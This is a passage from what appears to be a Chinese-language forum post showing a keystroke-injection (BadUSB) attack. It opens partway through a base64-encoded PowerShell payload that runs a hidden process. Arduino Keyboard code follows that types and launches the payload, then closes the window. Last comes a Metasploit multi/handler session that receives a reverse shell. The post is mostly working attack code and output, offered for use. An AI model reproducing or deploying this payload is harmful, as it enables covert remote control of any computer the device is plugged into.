QA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA");
  Keyboard.press(KEY_RETURN);
  delay(50);
  Keyboard.release(KEY_RETURN);
  delay(700);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F4);
  Keyboard.releaseAll();
  // Ending stream
  Keyboard.end();
}

/* Unused endless loop */
void loop() {}

启动监听

msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.59.128:4455 

再次烧录

烧录完成后cmd弹出输入攻击代码,然后收到shell

2赞

服务器资源由ZeptoVM赞助

Partners Wiki IRC